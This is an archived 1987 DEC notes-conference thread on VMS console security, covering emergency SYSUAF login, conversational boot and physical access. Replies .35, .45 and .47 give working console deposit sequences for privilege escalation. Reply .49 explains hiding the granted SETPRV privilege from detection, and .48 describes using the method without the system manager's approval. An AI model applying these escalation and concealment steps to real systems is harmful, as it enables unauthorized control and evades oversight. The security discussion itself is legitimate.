| T.R | Title | User | Personal Name
 | Date | Lines | 
|---|
| 411.1 | SYSUAF access | MOTHRA::DUTKO | Nestor Dutko, VMS/VAXclusters CSSE | Fri Feb 20 1987 13:35 | 17 | 
|  |     If a SYSUAF is found and it is in tack (no file corruption), the
    file will be used for ALL user authorization checks upon login/process
    creation.
    
    Should the file not be found, either through a logical name
    redefinition of SYSUAF to a bogus or non-existent file, or the file
    just not existing, only one terminal may be logged into.  That terminal
    is the system console, and the account is SYSTEM.
    
    Now, you can also use the SYSGEN parameter UAFALTERNATE to try and
    specify an SYSUAFALT file to be used to restrict usage when you
    are doing something strange.
    
    Make sense?  As always, the weakest link in system security is the
    console subsystem.  Once you get to it, breaking in is a snap.
    
    -- Nestor
 | 
| 411.2 | I thought it wasn't just SYSTEM though | FROST::HARRIMAN | Announcements..Art..It's Only Talk | Fri Feb 20 1987 17:01 | 14 | 
|  | >    Make sense?  As always, the weakest link in system security is the
>    console subsystem.  Once you get to it, breaking in is a snap.
    
    Sure, that's why you put locks on your doors. That's why physical
    security is supposedly so important. 
    
    BTW, I thought that if SYSUAF and SYSUAFALT weren't found it just
    logged onto OPA0: using any username, not just SYSTEM, and it
    gave you all privileges. Maybe I wasn't reading the LOGINOUT source
    correctly...? (calls it an "emergency login")...
    
    /pjh
    
 | 
| 411.3 | SYSTEM is created. | MONSTR::DUTKO | Nestor Dutko, VMS/VAXclusters CSSE | Sat Feb 21 1987 11:16 | 2 | 
|  |     You are right...  It does log you in using any username and password,
    however the user account created is SYSTEM.
 | 
| 411.4 | Say that one more time... | GENRAL::RINESMITH | Roger's Opinion stated below | Sat Feb 21 1987 11:48 | 6 | 
|  |     Point me to what you mean by the weakest link in system security
    is the console subsystem.  I assume you mean that someone could
    take down the system and then reboot using an alternate login or
    are you saying that anyone who has access to the console can just
    "LOGIN" ?
    
 | 
| 411.5 |  | MOTHRA::DUTKO | Nestor Dutko, VMS/VAXclusters CSSE | Sat Feb 21 1987 20:07 | 4 | 
|  |     You can just login, however, if the SYSUAF is in tact, you may only
    login to a valid account.
    
    
 | 
| 411.6 |  | PASTIS::MONAHAN |  | Sun Feb 22 1987 12:01 | 9 | 
|  |     	Anyone who has physical access to your console has full control
    of your system. Whether he can use this without being noticed is
    another matter, since he may have to reboot the system or at least
    temporarily halt it to use his power.
    
    	Bearing this in mind, it is intentional that you should be able
    to log in to a privileged account from the console if the SYSUAF
    is corrupted, since it may provide a faster recovery from a minor
    user error than a complete restore from backup of the system disk.
 | 
| 411.7 | Console tricks | CAFEIN::PFAU | You can't get there from here | Sun Feb 22 1987 22:27 | 13 | 
|  |     If SYSUAF.DAT is not found or is corrupted, anyone can log in at
    the console under any username with any password.  No one will be
    able to log in anywhere else.  The created process will have all
    privileges.
    
    Even without removing SYSUAF.DAT, one could reboot the system with
    a conversational boot and redirect the startup file to the console
    (SYSBOOT> SET/STARTUP OPA0:).  This will have the effect of giving
    the person a fully privileged process.
    
    Make sure your console terminal is ALWAYS secured.
    
    tom_p
 | 
| 411.8 |  | MKTUP1::EIBEN |  | Mon Feb 23 1987 13:07 | 20 | 
|  |     .. when I finally a couple of years ago got a little bit 'deeper'
    into VMS [having a 'workstation' at Your desk is a phantastic learning
    tool] I was concerned about that too.... [and still am..]
    
    1. How do You 'secure' a Console terminal ?? ye olde saying still
    holds true - that operators will disclose/allow anything for a case
    of beer.
    
    2. How do You 'secure' a Console terminal of a 'work-station' ??
    
    I sure didn't appreciate one night long time ago - having to scrounge
    [long after midnite] for another 'system-pack' - since MARKET {still
    running TOPS-20} lost against an intruder making use of a too trusting
    operator - but I sure enough felt pretty safe, knowing that operators
    {as any human being could make errors} - but could hardly circumvent
    security fences - AND DEFINITELY NOT using the CONSOLE TERMINAL.
    
    Rgds,
    Bernie.
    
 | 
| 411.9 | rotsa ruck | CAFEIN::PFAU | You can't get there from here | Mon Feb 23 1987 17:04 | 10 | 
|  |     The console is secured by placing it in a locked room that only
    certain people can get into.
    
    As far as workstations go, good luck!  It's difficult to (physically)
    secure a system that is located in a general work area.  �VAXen
    are pretty bad in this respect since all the switches are pushbutton
    or toggle (no key switches).  The bigger VAXen aren't much better
    with their 'one key fits all' switches.
    
    tom_p
 | 
| 411.10 | Humor | TLE::RMEYERS | Randy Meyers | Mon Feb 23 1987 18:32 | 4 | 
|  | Re: .8
> ... MARKET {still running TOPS-20} ....
I heard they once tried to run VMS, but the KL wouldn't boot.
 | 
| 411.11 | Maybe a case to learn from ?? | MKTUP1::EIBEN |  | Mon Feb 23 1987 19:11 | 13 | 
|  |     MARKET is {to my knowledge} the only system in this corporation,
    which is on both E-net and ARPA-net and also tolerates {with
    practically no supervision} PUBLIC LOGIN via LCG.KERMIT password
    KERMIT - sure we had our share of problems - but {knock on wood}
    MARKET was {and is tried} very often for 'break-ins' - not-so-much
    'cause of E-net linkage but more ARPA-net access - and its being
    secure for the last three years.
    
    Btw TOPS has no 'security' rating but University proven security
    
    Rgds,
    Bernie - for about 15 years involved with TOPS - its history ...
    
 | 
| 411.12 |  | PASTIS::MONAHAN |  | Tue Feb 24 1987 04:59 | 7 | 
|  |     	If you give me half a minute's free time at your microvax console
    I can walk away with your RD53 in my brief case. This is actually
    a quicker and easier way of stealing your data than going through
    a messy and complicated reboot sequence to get privileges.
    
    	I expect the operator on MARKET could have done a similar thing
    (if he had a large enough brief case :-).
 | 
| 411.13 |  | GENRAL::RINESMITH | Roger's Opinion stated below | Tue Feb 24 1987 09:53 | 3 | 
|  |     RE: .12
    		So your the one...   No wonder I could't get my
    microvax to boot.  
 | 
| 411.14 | was it a joke or was/is it true...??? | PUZZLE::JOSEPH | Let your spirits soar... | Tue Feb 24 1987 15:24 | 8 | 
|  |     I was told at one time , if you do NOT have a SYSUAF.DAT you then
    have an open system.
    
    Was that ever true ??? If yes, is it still true??
    
    Regars,
    
    	Bob.
 | 
| 411.15 | Did you read previous replies? | CAFEIN::PFAU | You can't get there from here | Tue Feb 24 1987 17:22 | 8 | 
|  |     If LOGINOUT can't find SYSUAF.DAT or finds it corrupted (that is,
    unreadable), ANYONE can log in AT THE CONSOLE TERMINAL with ANY
    USERNAME and ANY PASSWORD.  No one will be able to log in at any other
    port even if they enter a valid username and password (how can LOGINOUT
    determine if it's valid if it can't read SYSUAF.DAT?).  The account
    created at the console terminal will have ALL privileges. 
    
    tom_p
 | 
| 411.16 | I think I heard what you asked | FROST::HARRIMAN | Announcements..Art..It's Only Talk | Tue Feb 24 1987 17:59 | 10 | 
|  |     re: .-2
    
    What I believe I heard you ask was "was it ever that way". As far
    as I know, it never was. VMS V1 was pretty simpleminded compared
    to V4, etc, besides, the sources don't say - I suspect that VMS
    has performed like this for a long long time, and whoever told you
    that never tried it themselves.
    
    /pjh
    
 | 
| 411.17 |  | MKTUP1::EIBEN |  | Tue Feb 24 1987 19:40 | 16 | 
|  |     I'm NOT really concerned about the mVAX cluster I'm "managing" --
    
    1. Its {only} in MARKETING [only kidding ..]
    2. I don't put anything on it , I would put VALUE on [not so straight
       copy of a saying of Richard Stallman - author of EMACS and GNU,
       who had an account on MIT-ITS with name RMS - password RMS.
    
    I'm only slightly concerned {as a technical 'marketeer'} about us
    trying to get into 'big Blue' land with this type of attitudes
    regarding 'security'....
    
    Rgds,
    Bernie - who just found out, that nearly ANY failure regarding the
    	LOGIN-tree will let You in still as SYSTEM... a nice 'feature'
    	for 'hackers' ... and an 'open door' for invaders.
    
 | 
| 411.18 | what would you do? | 37935::ZARLENGA | Bigger they are, Harder they hit | Thu Feb 26 1987 15:54 | 9 | 
|  |     Bernie,
        What would you suggest the system should do if confronted with
    a "corrupted" SYSUAF.DAT?
    
    	Any alternative I can think of (individual "backup passwords"
    inscribed inside the cabinet, etc) is still subject to tampering.
    
    -mike z
 | 
| 411.19 | Showing my RSTS/E ancesctry | MAY20::MINOW | I need a vacation | Thu Feb 26 1987 20:25 | 8 | 
|  | >        What would you suggest the system should do if confronted with
>    a "corrupted" SYSUAF.DAT?
Take the system down and boot another system (from disk or magtape),
then create/recreate SYSUAF.DAT.  Or, is this impractical on VMS?
Martin.
 | 
| 411.20 | no answers, only questions | 38007::ZARLENGA | Bigger they are, Harder they hit | Sun Mar 01 1987 16:49 | 16 | 
|  |     	Not impractical if it's a VAX in a computer lab environment
    where backups are handy.  But if it's at home you may be stuck
    for quite awhile.
    
    	The point is, that if someone has access to the computer
    hardware (ie console, cabinet, front panel, etc) then with
    the right knowledge, they have complete access to the whole
    system.
    
    	Now, if you are going to protect the "system", you should
    consider the console terminal a part of that system that must
    be protected, just as the computer's front panel is (where
    a HLT, MEM EXA, MEM DEP, RUN can also and with much less of
    a trail).
    
	-mike
 | 
| 411.21 | New CBOOT system parameter | BARNA::SOLEPONT | Jaume, �Barcelona 1992� more than ever | Mon Mar 02 1987 14:03 | 11 | 
|  |     What about a new system parameter called CBOOT_ENABLED ?
	If CBOOT_ENABLED = 1 then SYSBOOT should act as usual.
	If CBOOT_ENABLED = 0 then SYSBOOT should prevent CONVERSATIONAL 
				bootstrap (bypassing R5 contents).
    At least, this should protect 90% of (actual remaining) security holes
    and it is very easy to implement because SYSBOOT reads VAXVMSSYS.PAR
    just before checking if must enter in conversational mode.
    *Jaume	
 | 
| 411.22 | What about emergencies then? | FROST::HARRIMAN | bicker,bicker,bicker | Mon Mar 02 1987 15:57 | 7 | 
|  |     re: .-1
    
        Then what do you do when SYS.EXE or something like that gets corrupted,
    or worse, your page or swap file, and you GOTTA do a conversational
    boot, and the system won't let you?
    
    /pjh
 | 
| 411.23 | Coming soon to a disk near you | SQM::HALLYB | Are all the good ones taken? | Mon Mar 02 1987 18:12 | 13 | 
|  | .21>    What about a new system parameter called CBOOT_ENABLED ?
.21>
.21>	If CBOOT_ENABLED = 1 then SYSBOOT should act as usual.
.21>	If CBOOT_ENABLED = 0 then SYSBOOT should prevent CONVERSATIONAL 
.21>				bootstrap (bypassing R5 contents).
    With Local Area VAXClusters there is in fact a SYSGEN parameter
    that does just that.  No conversational boot allowed.
    
    If you're paranoid about a corrupted SYS.EXE I suppose you could always
    have a backup version on another system root.  Just be sure to check IT...
      John
 | 
| 411.24 | Don't use if you don't like it | BARNA::SOLEPONT | Jaume, �Barcelona 1992� more than ever | Tue Mar 03 1987 03:13 | 12 | 
|  |     re: .22
	Emergencies can be solved with the remaining 10% of security hole.
	Plugging another system disk, bootstrapping alternate system roots
	or equivalent actions, wich in fact are more detectable/control-
	lable than just few console commands.
    comment: .23
	Alternate system roots should use CBOOT_ENABLED = 0 too!
    *Jaume
 | 
| 411.25 | Too easy | ULTRA::CRANE | Olorin I was in the West that is forgotten... | Tue Mar 03 1987 09:27 | 7 | 
|  | Anyone with access to the console has complete control of the system. Just
login on your nonprivileged account, halt the processor, poke a few locations,
start it running again, and you're logged-in with all privileges.
Hack, hack, hack,
Ron 
 | 
| 411.26 | exactly! | 37934::ZARLENGA | Bigger they are, Harder they hit | Tue Mar 03 1987 09:52 | 8 | 
|  | 
    re .25, That's what I was trying to say in .20
    
>    consider the console terminal a part of that system that must
>    be protected, just as the computer's front panel is (where
>    a HLT, MEM EXA, MEM DEP, RUN can also and with much less of
>    a trail).
 | 
| 411.27 |  | PASTIS::MONAHAN |  | Tue Mar 03 1987 11:58 | 5 | 
|  |     	I think 7ffda800 is the location to try, but I do not have a
    stand-alone machine to check. Let me run TELL.COM on your machine,
    and give me 10 seconds on your console terminal, and I will confirm
    it.
    	(or crash your system :-}  )
 | 
| 411.28 | Not so easy! | BARNA::SOLEPONT | Jaume, �Barcelona 1992� more than ever | Tue Mar 03 1987 14:07 | 15 | 
|  | 
.25>                             -< Too easy >-
.25> Anyone with access to the console has complete control of the system. Just
.25> login on your nonprivileged account, halt the processor, poke a few ...
			    -> Not so fast, Ron... <-
	When I was system mangler I had a system wide login procedure that
	nicely dropped out users without OPER privilege from _OPA0:
    *JAUME
	(But _YES_, I am agree that if anyone has access to the console,
	 sooner or later will hack everything [or crash it :-)] )
 | 
| 411.29 | yes, its too easy (when you know how) | PASTIS::MONAHAN |  | Tue Mar 03 1987 16:25 | 7 | 
|  |     	The job one logs in on need have nothing to do with OPA0. The
    one location poke gives the *current* job, that is, the one that
    is actually using CPU time, full privileges. It can even be a batch
    job.
    
    	Dave
    
 | 
| 411.30 |  | ULTRA::CRANE | Olorin I was in the West that is forgotten... | Wed Mar 04 1987 10:57 | 5 | 
|  | Well, it's not that hard to find the PCB of the right process (via the PCB
vector), and then the PHD, via PCB$L_PHD, and then to poke the
PHD$Q_PRIVMSK... 
Ron
 | 
| 411.31 | re: .30 ... i don't think so | TOLEDO::VENNER |  | Wed Mar 04 1987 15:46 | 14 | 
|  | 
    re: .30
    
    if i remember things correctly from the VMS internals class, all
    of the PCBs are in system space so you can get to them, but the
    address of the PHD which is found in the PCB is a virtual address
    and can only be resolved when you are the current process.
    
    so you can't just halt the system and pop values into anyone's
    PRIVMSK, only the PRIVMSK of the current process.  can anyone
    more knowledgeable back me up on this?
    
    - marty
     
 | 
| 411.32 |  | CAFEIN::PFAU | You can't get there from here | Wed Mar 04 1987 19:23 | 6 | 
|  |     Both are in system space so both should be addressable.  The problem
    is that the process header is located in paged pool and the address
    you try to poke may equate to a page that is not in physical memory.
    Since the machine has been halted, it won't be faulted in.
    
    tom_p
 | 
| 411.33 |  | MONSTR::DUTKO | Nestor Dutko, VMS/VAXclusters CSSE | Wed Mar 04 1987 22:48 | 13 | 
|  |     RE:.-1
    
    That is not as much of an issue as assuming that the process which
    you are mucking around with is your current process.  Your process
    may be in some nebulous wait state (LEF) and you just elevated someone
    elses priv's.
    
    The Virtual address within the PCB$L_PHD is the virtual address
    of teh PHD. You should be able to muck with it, given that nothing
    happens with you (like you get swapped out).  In that case, the
    number will be low.
    
    -- Nestor
 | 
| 411.34 | PHD always available | WINERY::MILLER |  | Fri Mar 06 1987 18:47 | 5 | 
|  |     Also, the fixed portion of the PHD is never paged, and is only swapped
    when the whole process has been swapped out already.  The PHD's
    are in the Balance Slot part of system virtual address space.  E/V
    (examine/virtual) also works quite well on the console.
    
 | 
| 411.35 |  | SYRAH::THOMAS | The Code Warrior | Sun Mar 08 1987 21:04 | 2 | 
|  |     Why do it the hard way?  D/V/W 80003D00 FFFF
    (See description of MAXSYSGROUP)
 | 
| 411.36 |  | PASTIS::MONAHAN |  | Mon Mar 09 1987 15:56 | 10 | 
|  |     re: .35    I like that one!  I hadn't thought of that.
    
    	I was going to try patching out one of the protection checks
    in XQP. (Its all shared code, so it shouldn't matter which process
    you hit). Now you have spoilt my fun by making it too easy.
    
    	Anyone still like to claim that their system is 90% safe if
    a hacker can get near the console    :-)
    
    		Dave
 | 
| 411.37 | What do you consider NEAR? | CAFEIN::PFAU | You can't get there from here | Mon Mar 09 1987 21:07 | 3 | 
|  |     Near?  No problem.
    
    tom_p
 | 
| 411.38 | Console with no keyboard | GENRAL::RINESMITH | I (��) you! | Wed Mar 11 1987 13:46 | 1 | 
|  |     On an 8200-8300 a DECprinter III makes a pretty secure console.
 | 
| 411.39 |  | PASTIS::MONAHAN |  | Wed Mar 11 1987 15:53 | 6 | 
|  |     	Don't forget the Field Service hand-held terminals. If I can
    carry out an RD53 in a brief case, I can carry in a terminal in
    a coat pocket!
    
    	It depends to some extent on how much ingenuity, preparation,
    knowlege (and money) you are trying to protect against.
 | 
| 411.40 | you MUST protect the hardware! | 37934::ZARLENGA | Bigger they are, Harder they hit | Wed Mar 11 1987 16:50 | 10 | 
|  |     	EXACTLY! If you let someone "touch" the "system", there
    is a very good chance that that person, given the right
    knowledge and equipment, will be able to break in.  In many
    cases, undetected.
    
    	I believe this is independent of the computer and operating
    system.  Does anyone know of a "physically secure" computer (ie
    one that needs no additional barriers to be secure) ?? I don't.
    
    -mike
 | 
| 411.41 | Physical security costs money... | VIKING::WASSER | John A. Wasser | Thu Mar 12 1987 12:03 | 15 | 
|  | > Does anyone know of a "physically secure" computer (ie one that needs no 
> additional barriers to be secure) ??
	The IBM-PC/AT comes with a key switch that disables keyboard
	input.  Unfortunately you can take the top cover off the
	machine fairly easily.  If they had designed the sytem so that
	the top cover was locked when the keyboard was disabled, they
	would have a much more physically secure system.
	You can build a physically secure system easily enough... you
	just have to find someone willing to pay for the security.
	Since most mainframes are kept behind locked doors, most
	customers wouldn't want to pay extra for a system with its
	own physical security.
 | 
| 411.42 |  | VIDEO::LEICHTERJ | Jerry Leichter | Sat Mar 14 1987 11:35 | 14 | 
|  | The IBM PC/RT has a key switch that locks the box:  You can take the outer skins
off, but you can't get at the card cages or much of anything else.
Off course, the metal being locked is pretty thin; you could force your way in
physcally in a couple of minutes.  I doubt you could do it EASILY without
leaving obvious traces, however.
People break into bank vaults, 6-inch (or mor) thick steel walls, alarms, and
all; there is no such thing as "perfect" physical security.
BTW, there are 3rd-party vendors who will sell you a device that encloses you
�VAX and protects it.  I think there are a bunch of them up in Hudson....
							-- Jerry
 | 
| 411.43 | the name for 8003d00 is exe$gl_SYSUIC | SNO78A::BRAHAM | Pete Braham | Mon Mar 16 1987 18:53 | 3 | 
|  |     Re .35 (D/V/W 8003D00 FFFF) 8003D00 is EXE$GL_SYSUIC of course in
    SYS.MAP 
    
 | 
| 411.44 |  | CASEE::COWAN | Ken Cowan | Sun Mar 22 1987 11:54 | 10 | 
|  | 
    I don't expect to be to secure my system without resorting to
    physical security.  All of the security holes mentioned so
    far rely on failed physical security.
    
    BTW, I remember hearing stories that the best way to 'break in'
    to a system was to observe the patterns of the humans in the 
    system.  People were always the weakest link.
    
    	KC
 | 
| 411.45 | why use offsets ? Hit it straight ! | PILOU::BONGARTZ | Happy Hacker | Mon Mar 23 1987 08:26 | 33 | 
|  |      
    
    	Why make it complicated ? using a simple loop in dcl, you get
    	a reasonable good chance that your non-privileged process is
        the current one, thus you can just come along and poke a  -1
        to ctl$gq_procpriv ... provided you're on the console...
    
    $ examine/hex/long 7ffeff10:7ffeff14    ! check your current privs
    7FFEFF10: 00108000 00000000             ! (just to have the value)
    $ cre x.com                             ! create a dcl loop
    $loop:
    $ goto loop
    ^Z
    $ @x                                    ! kick it off...
    ^P                                      ! get to the kernel
    >>> H
    >>> E/V/L 7FFEFF10                      ! check our privs,
            P xxxxxxxx 00108000             ! if not same do a
    >>> E                                   ! few Cont/Halt 'till
            P xxxxxxxx 00000000             ! we hit them
    >>> E P
              00000009                      ! check current PSL
    >>> D P 41F0000                         ! kernel mode,IPL 31
    >>> D/V/L 7FFEFF10 FFFFFFFF             ! (so we can write to
    >>> D/V/L 7FFEFF14 FFFFFFFF             ! ctl$gq_procpriv)
    >>> D P 00000009                        ! restore psl (!!)
    >>> C                                   ! and continue...
    ^Y                                      ! bail out of command file
    $                                       ! and enjoy your privs ...
                                                                      
    
                                                          
    
 | 
| 411.46 | problem making sure it's you | VIDEO::OSMAN | Eric, dtn 223-6664, weight 146 | Mon Mar 23 1987 13:41 | 13 | 
|  | re: That little bit about "see if privs match, otherwise do a few
CONTINUE/HALTs until they do".
	This seems like a very inaccurate way to make sure you're
	the current process.  Probably your privs are the same as
	most other people, so you'll often see the right privs even
	though you might not really have the correct process yet,
	right ?
	Perhaps better to check some cell that contains your pid
	or your terminal name.
/Eric
 | 
| 411.47 |  | PASTIS::MONAHAN |  | Mon Mar 23 1987 16:51 | 35 | 
|  |    	If you are compute bound (and most other users are not) then
    there is a high probability that you will get your own process.
    If you do not, then just try again. If you are really a hacker,
    you probably do not care how many processes you make privileged
    before you get your own - the other users will never notice, and
    even if they do, so what??  "Its a VMS bug, my process suddenly
    became privileged".
    
    	It may be inaccurate, but who the hacker cares?
    
    	What is rather more interesting is what to do when you do not
    have control of any process. In this case, there is no process you
    own for which you can elevate the privileges. I would suggest a
    technique like the following :-
    
    1) All halts must be short so you do not hit a time out in a LAVc,
    so first find a LRP and detach it from its list. Then continue.
    
    2) A little at a time, deposit into this LRP the code to create
    a process that is fully privileged, and with its SYS$COMMAND the
    console terminal. Detaching the LRP must be done as a single operation
    within the time-out periods, but now you need only do a single deposit
    at a time if you wish between restarting the processor.
    
    3) Finally patch a jump to your code into the swapper process, and
    wait for the console terminal to become "live".
    
    
    	I would be interested to know if any hacker has actually done
    this. It sounds tedious, but should only take a couple of minutes
    if well prepared. The technique, of course, is what VMS uses to
    create the initial STARTUP process, so it is probably even supported
    :-)   :-)
    
    		Dave
 | 
| 411.48 |  | VIDEO::OSMAN | Eric, dtn 223-6664, weight 146 | Tue Mar 24 1987 14:14 | 27 | 
|  | Re:>    If you are compute bound (and most other users are not) then
>    there is a high probability that you will get your own process.
>    If you do not, then just try again. If you are really a hacker,
>    you probably do not care how many processes you make privileged
>    before you get your own - the other users will never notice, and
   My point is, you certainly care whether or not you've managed
    to make your own process privileged, so checking the privilege
    word to see if its yours seems like a bad way to do that, since
    most processes will have the same privs as yours.
    
    As far as "high probability", no, your're wrong.  If at least
    one other person is running a compute-bound job, you'll have
    a good chance of hitting their job, not yours.
    
    However, I like your basic method, and I've squirreled it away.
    Every once in a while I run into a really frustrating situation
    where I know EXACTLY how to change what I need on a system, but
    its the middle of the night, and I don't have privileges, and
    the system manager is home sleeping.  I just KNOW that he'd
    gladly grant my request if he were here.
    
    He's not, so what do I do ?  Your method might be handy in
    such a case.  (but I would suggest refining the synchronization
    procedure as I mentioned)
    
    /Eric
 | 
| 411.49 |  | VIDEO::LEICHTERJ | Jerry Leichter | Tue Mar 24 1987 23:04 | 11 | 
|  | Rather than turning on ALL the privilege bits, turn on just SETPRV.  The
only way a user you "accidentally" gave tht too would notice is if he
did a SHOW PROC/PRIV, since it has no direct effect on your ability to
do anything.
Even better:  Set SETPRV in the process's AUTHPRIV, but not in its CURRPRIV
values.  Then it won't show up even on a SHOW PROC/PRIV.  However, unlike
other privileges, SETPRV is special-cased:  If it's in AUTHPRV, you can set
any privilege you want even if it's not "currently enabled".
							-- Jerry
 | 
| 411.50 | Ring on priv | VIKING::WASSER | John A. Wasser | Wed Mar 25 1987 08:28 | 10 | 
|  | > there is a high probability that you will get your own process.
> the other users will never notice
    
	I agree.  It would, however, be nice to know when you hit the
	right job.  How about writing a little program (in whatever 
	language) to be compute bound for a while and then check to see 
	if the appropriate privs have been granted.  It could ring
	the bell or something.  Run the program on one terminal and
	do the trick at the console until the bell starts ringing!
	
 | 
| 411.51 | The FATA Morgana of SECURITY | MKTUP1::EIBEN |  | Wed Mar 25 1987 18:45 | 9 | 
|  |     Aaah - the last couple of replies are FULLY in the 'spirit' of this
    notes-file. Just don't let them out to the NSA-people, who got
    brainwashed to give VMS a 'security-rating'.
    
    Rgds,
    Bernie [following RMS'es {Richard Stallman - author of EMACS/GNU}
    motto : "Would You put anything of personal value onto a computer
    system ??" ].
    
 |